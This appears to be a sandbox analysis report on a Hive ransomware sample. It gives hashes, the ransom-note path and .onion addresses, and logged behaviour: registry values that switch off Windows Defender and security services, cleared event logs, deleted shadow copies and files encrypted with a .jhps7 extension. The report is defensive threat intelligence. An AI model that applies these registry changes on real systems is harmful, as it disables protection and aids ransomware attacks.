Analysis
-
max time kernel
147s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
12/03/2025, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
-
Size
3.1MB
-
MD5
f5d7efaec3c1274b0aaa704a6caa1671
-
SHA1
ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
-
SHA256
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
-
SHA512
dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
-
SSDEEP
49152:imfcJ4D5NnqxkGcfxPxZHPlCJKC732T4rOB3IJ2LL8JcL8LBetlyQ1D11:imfcO1Nq6GcfRdF
Malware Config
Extracted
C:\Program Files\GyDM_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4736 wevtutil.exe 3688 wevtutil.exe 3464 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 1644 powershell.exe 1640 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_k5db45LdAFg0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-oob.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_2Dgpj411O-Y0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.INF.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_F2b4UzYNxjE0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-100_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-100.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.schema.mfl.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_icjkvFQjslI0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_YPfeHKZvkyYNYbquyrsfxzsr_EyzUnnOn4KY0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-125_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_fr-CA.json 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-60_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80_altform-unplated_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\WideTile.scale-125.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\JumpListNewNote.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-100.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-72_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_YPfeHKZvkyYNYbquyrsfxzsr_9BPvP_fyHJg0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_sruRl_-U0Vg0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_AQga9YXkgN00.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrespsh.dat 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-phn.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_XDqZsmCf_4s0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-100.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\System\ado\msadomd28.tlb 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfxswt.jar.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_ZSP8eai4JeA0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\es-ES.PhoneNumber.model 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageMedTile.scale-400.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoSearchResults_180x160.svg.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_Rxphq2mk64w0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-ul-phn.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_VrqP2oKM5yo0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_COL.HXC.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_qX8YD1fdE1I0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\WideTile.scale-125.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\203.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Dark.scale-300.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_j8rRFUKzPoU0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-150.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_YByAA63Sd-o0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_eYKoKR_n2_Q0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleMedTile.scale-100.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireMedTile.scale-200.jpg 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\vi_get.svg.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_2Eyp1C8Mgw00.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsptb.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_D5V4_lABtVo0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-150_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\PSGet.Resource.psd1.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_lTvQ0QhFy2E0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black_devicefamily-colorfulunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_MAK_AE-ppd.xrm-ms.0AuY-en5w5QV0dh2YE_YPfeHKZvkyYNYbquyrsfxzsr_w9gB_3ckH7c0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-400.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3096 sc.exe 976 sc.exe 1524 sc.exe 4092 sc.exe 4712 sc.exe 4480 sc.exe 1756 sc.exe 8 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1644 powershell.exe 1644 powershell.exe 1644 powershell.exe 1640 powershell.exe 1640 powershell.exe 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
